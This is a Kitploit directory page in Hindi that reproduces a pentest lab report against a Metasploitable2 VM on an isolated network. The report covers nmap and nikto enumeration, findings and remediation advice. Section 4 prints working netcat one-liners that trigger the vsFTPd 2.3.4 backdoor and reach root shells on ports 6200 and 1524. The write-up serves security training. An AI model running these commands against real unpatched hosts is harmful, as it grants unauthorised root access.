Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pentest-lab-metasploitable2 — पृथक नेटवर्क में पेंटेस्ट लैब: nmap/nikto के साथ एन्यूमरेशन और Metasploitable2 का मैनुअल एक्सप्लॉइटेशन (backdoor vsFTPd CVE-2011-2523, bindshell) पूर्ण तकनीकी रिपोर्ट के साथ। | Kitploit
उपकरण/GitHubGitHub/danreis20/pentest-lab-metasploitable2
टोहीवेब भेद्यता स्कैनरनेटवर्क मैपिंगभेद्यता विश्लेषणशोषणCTFपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लैब और अभ्यास
GitHubdanreis20/pentest-lab-metasploitable2

pentest-lab-metasploitable2

पृथक नेटवर्क में पेंटेस्ट लैब: nmap/nikto के साथ एन्यूमरेशन और Metasploitable2 का मैनुअल एक्सप्लॉइटेशन (backdoor vsFTPd CVE-2011-2523, bindshell) पूर्ण तकनीकी रिपोर्ट के साथ।

रिपॉजिटरी देखें
319घं 13मि पहलेअभी तक समीक्षित नहीं

पृथक नेटवर्क में पेनेट्रेशन टेस्टिंग लैब

लेखक: Daniel Stefan de Jesus dos Reis दिनांक: सितंबर/2026 वातावरण: पृथक वर्चुअल नेटवर्क pentestlab में व्यक्तिगत KVM लैब

दायरा और प्राधिकरण सूचना

यह परीक्षण विशेष रूप से एक स्वयं की और जानबूझकर कमजोर बनाई गई वर्चुअल मशीन के विरुद्ध किया गया था, जिसे Rapid7 द्वारा विशेष रूप से आक्रामक सुरक्षा प्रशिक्षण के उद्देश्य से वितरित किया गया है, एक पृथक वर्चुअल नेटवर्क के भीतर जिसका इंटरनेट से कोई बाहरी कनेक्शन नहीं है। किसी तीसरे पक्ष के सिस्टम का उपयोग नहीं किया गया। यह परियोजना विशेष रूप से शैक्षिक उद्देश्य के लिए है, जो घुसपैठ परीक्षण कौशल के विकास के लिए है।

1. लैब की संरचना

  • हाइपरवाइज़र: KVM/libvirt
  • वर्चुअल नेटवर्क: pentestlab (ब्रिज virbr-lab), सबनेट 192.168.100.0/24, कोई <forward> कॉन्फ़िगर नहीं — यानी, वास्तव में एक पृथक नेटवर्क: VMs आपस में और होस्ट के साथ संवाद कर सकते हैं, लेकिन लैब के बाहर कोई रूट नहीं है। नेटवर्क की XML evidencias/pentestlab_network.xml में है।
  • हमलावर होस्ट: स्वयं होस्ट मशीन, virbr-lab इंटरफ़ेस के साथ, nmap, nikto, gobuster, hydra, sqlmap और netcat का उपयोग करते हुए।
  • लक्ष्य: VM metasploitable2 (Metasploitable2, संशोधित Ubuntu 8.04), IP 192.168.100.90/24, पृथक नेटवर्क के DHCP द्वारा असाइन किया गया।
root@kitploit:~
[ Host / Atacante ]  
        |
   virbr-lab (rede isolada, sem saída para internet)
        |
[ metasploitable2 ] 

2. कार्यप्रणाली

मैंने एक बुनियादी प्रवाह का पालन किया: पहचान → गणना → शोषण → दस्तावेज़ीकरण:

  1. होस्ट डिस्कवरी और सेवा/संस्करण पहचान के साथ पूर्ण TCP पोर्ट स्कैन (nmap -sV -sC -p-)
  2. वेब भेद्यता स्कैन (nikto)
  3. पहचाने गए संस्करणों से जुड़ी ज्ञात भेद्यताओं (CVE) को प्राथमिकता देना
  4. मैन्युअल शोषण जहाँ नीचे दिए गए सभी चरण nc के साथ किए गए, प्रत्येक विफलता के तंत्र को समझने के लिए, न कि केवल "एक्सप्लॉइट चलाना"
  5. साक्ष्य और सुधार सिफारिशों का दस्तावेज़ीकरण

3. पहचान — पूर्ण स्कैन

कमांड: nmap -sV -sC -p- -T4 192.168.100.90 पूर्ण आउटपुट: evidencias/nmap_full_scan.txt

पाए गए सबसे प्रासंगिक सेवाओं का सारांश:

4. शोषित भेद्यताएँ (पुष्ट)

4.1 vsFTPd 2.3.4 में बैकडोर — CVE-2011-2523 (गंभीर)

30/06/2011 और 03/07/2011 के बीच, डाउनलोड के लिए उपलब्ध कराए गए vsFTPd 2.3.4 के स्रोत कोड को एक हमलावर द्वारा छेड़छाड़ किया गया था। समझौता किए गए संस्करण में एक बैकडोर है: FTP लॉगिन के उपयोगकर्ता फ़ील्ड में :) पर समाप्त होने वाली स्ट्रिंग प्राप्त होने पर, सर्वर बिना किसी प्रमाणीकरण के TCP पोर्ट 6200 पर एक रूट शेल खोलता है।

निष्पादित चरण (पूर्ण लॉग evidencias/vsftpd_backdoor_exploit.txt में):

root@kitploit:~
# 1. Disparar a backdoor enviando USER terminado em ":)"
( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21

# 2. Conectar na porta 6200, aberta pela backdoor
( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200

परिणाम:

root@kitploit:~
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

बिना प्रमाणीकरण के पूर्ण रूट पहुँच प्राप्त की गई।

4.2 पोर्ट 1524/tcp पर उजागर bindshell (गंभीर)

nmap पहले से ही इस सेवा को Metasploitable root shell के रूप में पहचानता है — यह छवि में जानबूझकर छोड़ा गया एक बैकडोर है (पिछले एक्सप्लॉइट का अवशेष, जो प्रशिक्षण छवियों में आम है)। इसके लिए शोषण की आवश्यकता नहीं है: बस कनेक्ट करें।

root@kitploit:~
( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524

परिणाम: uid=0(root) gid=0(root) groups=0(root) — तत्काल रूट।

पूर्ण लॉग evidencias/bindshell_1524.txt में।

5. पहचानी गई भेद्यताएँ (इस दौर में शोषित नहीं)

5.1 UnrealIRCd 3.2.8.1 — CVE-2010-2075 (गंभीर, संस्करण द्वारा पहचानी गई)

पोर्ट 6667/6697 पर चल रहे UnrealIRCd का संस्करण ऐतिहासिक रूप से बैकडोर के साथ वितरित एक बिल्ड से मेल खाता है (AB; कमांड के बाद एक शेल कमांड)। मैंने nc के माध्यम से मैन्युअल रूप से बैकडोर को ट्रिगर करने का प्रयास किया, लेकिन सर्वर ने इनपुट को एक अमान्य IRC कमांड (451 :You have not registered) के रूप में माना, बजाय कमांड निष्पादित करने के — या तो इस विशिष्ट छवि में ट्रोजनयुक्त बाइनरी नहीं है, या पेलोड को बारीक समायोजन की आवश्यकता है जिसे मैंने इस दौर में प्राथमिकता नहीं दी। मैं इसे एक असफल प्रयास के रूप में दर्ज करता हूँ, पुष्ट भेद्यता के रूप में नहीं।

5.2 distccd 3632/tcp — CVE-2004-2687 (उच्च)

वितरित संकलन सेवा जो कनेक्ट होने वाले किसी भी क्लाइंट से मनमाने कमांड स्वीकार करती है, बिना प्रमाणीकरण के। संस्करण द्वारा पहचानी गई, इस दौर में शोषित नहीं।

5.3 Java RMI Registry — पोर्ट 1099/tcp (उच्च)

ऐतिहासिक रूप से डीसेरियलाइज़ेशन के माध्यम से दूरस्थ कोड निष्पादन के प्रति संवेदनशील। संस्करण द्वारा पहचानी गई, इस दौर में शोषित नहीं।

6. वेब गणना (nikto)

कमांड: nikto -h 192.168.100.90 -p 80 पूर्ण आउटपुट: evidencias/nikto_scan.txt

मुख्य निष्कर्ष:

  • Apache 2.2.8 पुराना (उस समय की वर्तमान श्रृंखला 2.2.22+ थी)
  • HTTP विधि TRACE सक्रिय (संभावित XST)
  • /phpinfo.php सार्वजनिक रूप से उजागर (PHP कॉन्फ़िगरेशन प्रकट करता है)
  • /phpMyAdmin/ बिना IP प्रतिबंध के सुलभ
  • /doc/, /test/ और /icons/ में निर्देशिका सूचीकरण सक्षम
  • phpMyAdmin कुकी httponly फ़्लैग के बिना बनाई गई

7. सुधार सिफारिशें

8. इस लैब ने व्यवहार में क्या प्रदर्शित किया

  • nmap के साथ नेटवर्क पहचान और गणना (पूर्ण स्कैन, सेवा/संस्करण पहचान, NSE स्क्रिप्ट)
  • एक वास्तविक बैकडोर (vsFTPd) के तंत्र की समझ और netcat के माध्यम से मैन्युअल शोषण, स्वचालित फ्रेमवर्क पर निर्भर किए बिना
  • nikto के साथ वेब भेद्यता विश्लेषण
  • रिपोर्ट प्रारूप में एक घुसपैठ परीक्षण का दस्तावेज़ीकरण: दायरा, कार्यप्रणाली, गंभीरता के अनुसार प्राथमिकता वाले निष्कर्ष और सुधार सिफारिशें
  • एक पृथक और सुरक्षित लैब वातावरण का रखरखाव (इंटरनेट से बाहर निकलने के बिना वर्चुअल नेटवर्क)

9. अगले कदम

  • इस निष्कर्ष को बंद करने के लिए, पुष्ट ट्रोजनयुक्त छवि संस्करण के साथ UnrealIRCd शोषण को दोहराएँ
  • pentestlab नेटवर्क में एक दूसरी समर्पित हमलावर मशीन (जैसे Kali Linux) जोड़ें, बजाय सीधे होस्ट से हमला करने के
  • इस लैब को Active Directory परिदृश्य तक विस्तारित करें (परियोजना अलग से नियोजित)
टूल डाउनलोड करें
पोर्टसेवासंस्करणटिप्पणी
21/tcpFTPvsftpd 2.3.4अनाम लॉगिन की अनुमति + ज्ञात बैकडोर
22/tcpSSHOpenSSH 4.7p1पुराना
23/tcpTelnetLinux telnetdस्पष्ट टेक्स्ट प्रोटोकॉल
25/tcpSMTPPostfix—
80/tcpHTTPApache 2.2.8 + PHP 5.2.4phpMyAdmin और phpinfo.php उजागर
139/445/tcpSMBSamba 3.0.20-Debianसंदेश हस्ताक्षर अक्षम
1099/tcpJava RMIGNU Classpath grmiregistryऐतिहासिक रूप से RCE के प्रति संवेदनशील
1524/tcpbindshell—रूट शेल पहले से खुला, बिना प्रमाणीकरण
3306/tcpMySQL5.0.51a-3ubuntu5—
3632/tcpdistccdv1ऐतिहासिक रूप से RCE के प्रति संवेदनशील (CVE-2004-2687)
5432/tcpPostgreSQL8.3.0–8.3.7—
5900/tcpVNCप्रोटोकॉल 3.3—
6667/6697/tcpIRCUnrealIRCd 3.2.8.1संस्करण ज्ञात बैकडोर से जुड़ा
8180/tcpHTTPApache Tomcat 5.5—
निष्कर्षसिफारिश
vsFTPd 2.3.4 बैकडोरकभी भी अनधिकृत/असत्यापित स्रोतों से बाइनरी का उपयोग न करें; स्थापना से पहले पैकेज का हैश/हस्ताक्षर सत्यापित करें
पोर्ट 1524 पर bindshellनियमित रूप से खुले पोर्ट का ऑडिट करें (आवधिक आंतरिक nmap); कोई भी अप्रलेखित शेल एक घटना है
बिना प्रमाणीकरण के उजागर distccdफ़ायरवॉल के माध्यम से विश्वसनीय होस्ट तक सीमित करें या यदि सक्रिय वितरित बिल्ड उपयोग में नहीं है तो अक्षम करें
phpMyAdmin/phpinfo.php उजागरIP/VPN द्वारा पहुँच प्रतिबंधित करें, प्रशासनिक उपकरणों को कभी सार्वजनिक रूप से उजागर न करें
Apache/PHP पुरानेपैच प्रबंधन प्रक्रिया सक्रिय रखें
निर्देशिका सूचीकरण सक्षमApache में Options Indexes अक्षम करें
SMB में संदेश हस्ताक्षर अक्षमserver signing = mandatory सक्षम करें